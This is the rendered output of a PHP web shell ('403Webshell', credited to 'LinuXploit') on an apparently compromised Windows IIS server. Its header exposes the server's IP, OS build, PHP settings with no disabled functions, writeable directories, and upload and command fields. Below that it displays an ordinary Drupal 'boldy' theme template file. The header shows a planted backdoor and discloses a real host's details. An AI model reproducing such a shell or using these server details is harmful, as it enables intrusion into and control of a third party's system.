403Webshell
Server IP : 195.130.67.5  /  Your IP : 216.73.217.154
Web Server : Microsoft-IIS/10.0
System : Windows NT WEBSERVER1 10.0 build 17763 (Windows Server 2016) i586
User : IUSR ( 0)
PHP Version : 7.4.19
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /inetpub/wwwroot/business/pms/modules/boldy/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /inetpub/wwwroot/business/pms/modules/boldy//page-front.tpl.php
<?php
// $Id$
?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
  "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php print $language->language ?>" lang="<?php print $language->language ?>" dir="<?php print $language->dir; ?>">
  <head>
    <?php print $head; ?>
    <title><?php print $head_title; ?></title>
    <?php print $styles; ?>
    <?php print $scripts; ?>
    <!--[if lt IE 7]>
      <?php print boldy_get_ie_styles(); ?>
    <![endif]-->
  </head>
  <body class="<?php print $body_classes; ?>">
    <div id="mainWrapper"> <!-- BEGIN MAINWRAPPER -->
      <div id="wrapper"> <!-- BEGIN WRAPPER -->
        <div id="header"> <!-- BEGIN HEADER -->
          <?php
            // Prepare header
            $site_fields = array();
            if ($site_name) {
              $site_fields[] = check_plain($site_name);
            }
            if ($site_slogan) {
              $site_fields[] = check_plain($site_slogan);
            }
            $site_title = implode(' ', $site_fields);
            if ($site_fields) {
              $site_fields[0] = '<span>'. $site_fields[0] .'</span>';
            }
            $site_html = implode(' ', $site_fields);

            if ($logo || $site_title) {
              print '<div id="logo"><h1>';
              if ($logo) {
                print '<a href="'. check_url($front_page) .'" title="'. $site_title .'"><img src="'. check_url($logo) .'" alt="'. $site_title .'" /></a>';
              }
              print '<a href="'. check_url($front_page) .'" title="'. $site_title .'">'. $site_html .'</a></h1></div>';
            }
          ?>
          <!-- BEGIN MAIN MENU -->
          <div id="mainMenu">
            <?php if (isset($primary_links)): ?>
              <?php print theme('links', $primary_links, array('class' => 'links primary-links')); ?>
            <?php endif; ?>
            <?php if (isset($nav_bar)): ?>
              <?php print $nav_bar; ?>
            <?php endif; ?>
          </div>
          <!-- END MAIN MENU -->
          <?php if ($search_box): ?>
            <div id="topSearch"> <!-- BEGIN TOP SEARCH -->
              <?php print $search_box; ?>
            </div> <!-- END TOP SEARCH -->
          <?php endif; ?>
          <div id="topSocial"> <!-- BEGIN TOP SOCIAL LINKS -->
            <ul>
              <?php if (theme_get_setting('boldy_linkedin_link')!=""): ?>
                <li><a href="<?php print theme_get_setting('boldy_linkedin_link'); ?>" class="linkedin" title="Join us on LinkedIn!"><img src="/<?php print drupal_get_path('theme', 'boldy'); ?>/images/ico_linkedin.png" alt="LinkedIn" /></a></li>
              <?php endif; ?>
              <?php if (theme_get_setting('boldy_twitter_user')!=""): ?>
                <li><a href="http://www.twitter.com/<?php print theme_get_setting('boldy_twitter_user'); ?>" class="twitter" title="Follow Us on Twitter!"><img src="/<?php print drupal_get_path('theme', 'boldy'); ?>/images/ico_twitter.png" alt="Follow Us on Twitter!" /></a></li>
              <?php endif; ?>
              <?php if(theme_get_setting('boldy_facebook_link')!=""): ?>
                <li><a href="<?php print theme_get_setting('boldy_facebook_link'); ?>" class="twitter" title="Join Us on Facebook!"><img src="/<?php print drupal_get_path('theme', 'boldy'); ?>/images/ico_facebook.png" alt="Join Us on Facebook!" /></a></li>
              <?php endif; ?>
              <li><a href="rss" title="RSS" class="rss"><img src="/<?php print drupal_get_path('theme', 'boldy'); ?>/images/ico_rss.png" alt="Subcribe to Our RSS Feed" /></a></li>
            </ul>
          </div> <!-- END TOP SOCIAL LINKS -->
        </div> <!-- END HEADER -->
        <!-- BEGIN CONTENT -->
        <div id="content"> <!-- BEGIN HOME CONTENT -->
          <?php if ($slider): ?>
            <div id="slider-wrapper">
              <div id="slider"> <!-- BEGIN SLIDER -->
                <?php print $slider; ?>
              </div> <!-- END SLIDER -->
            </div>
          <?php endif; ?>
          <?php if ($mission): ?>
            <div id="blurb"> <!-- BEGIN BLURB -->
              <p>
                <a href="contact"><img src="<?php print drupal_get_path('theme', 'boldy'); ?>/images/but_blurb.png" alt="Contact Us" /></a>
                <?php print $mission; ?>
              </p>
            </div> <!-- END BLURB -->
          <?php endif; ?>
          <!-- begin home boxes -->
          <?php if ($home_boxes): ?>
            <div id="homeBoxes" class="clearfix">
              <?php print $home_boxes; ?>
            </div> <!-- end home boxes -->
          <?php endif; ?>
        <!-- END HOME CONTENT -->
      </div> <!-- END CONTENT -->
  </div> <!-- END WRAPPER -->
      <div id="footer"> <!-- BEGIN FOOTER -->
        <?php if (theme_get_setting('boldy_footer_actions')): ?>
          <div style="width:960px; margin: 0 auto; position:relative;">
            <a href="#" id="showHide" <?php if(theme_get_setting('boldy_actions_hide') == "hidden"): print 'style="background-position:0 -16px"'; endif; ?>>Show/Hide Footer Actions</a>
          </div>
          <div id="footerActions" <?php if (theme_get_setting('boldy_actions_hide') == "hidden"): print 'style="display:none"'; endif; ?>>
            <div id="footerActionsInner">
              <?php if(theme_get_setting('boldy_twitter_user') != "" && theme_get_setting('boldy_latest_tweet')): ?>
                <div id="twitter">
                  <a href="http://twitter.com/<?php print theme_get_setting('boldy_twitter_user'); ?>" class="action">Follow Us!</a>
                  <div id="latest">
                    <div id="tweet">
                      <div id="twitter_update_list"></div>
                    </div>
                    <div id="tweetBottom"></div>
                  </div>
                </div>
              <?php endif; ?>					
              <script type="text/javascript" src="http://twitter.com/javascripts/blogger.js"></script>
              <script type="text/javascript" src="http://twitter.com/statuses/user_timeline/<?php print theme_get_setting('boldy_twitter_user'); ?>.json?callback=twitterCallback2&amp;count=<?php 
                if(theme_get_setting('boldy_number_tweets')!=""){
                  print theme_get_setting('boldy_number_tweets');
                }
                else{
                  print "1";
                } ?>">
              </script>
              <?php if ($footer_actions): ?>
              <div id="quickContact">
                <?php print $footer_actions; ?>
              </div>
              <?php endif; ?>
            </div>
          </div>
        <?php endif; ?>
        <div id="footerWidgets">
          <div id="footerWidgetsInner">
          <?php if ($footer): ?>
            <?php print $footer; ?>
          <?php endif; ?>
          <?php if ($footer_message): ?>
            <div id="copyright"> <!-- BEGIN COPYRIGHT -->
              <?php print $footer_message; ?>
            </div> <!-- END COPYRIGHT -->
          <?php endif; ?>
          </div>
        </div>
      </div> <!-- END FOOTER -->
    </div> <!-- END MAINWRAPPER -->
    <?php print $closure; ?>
  </body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit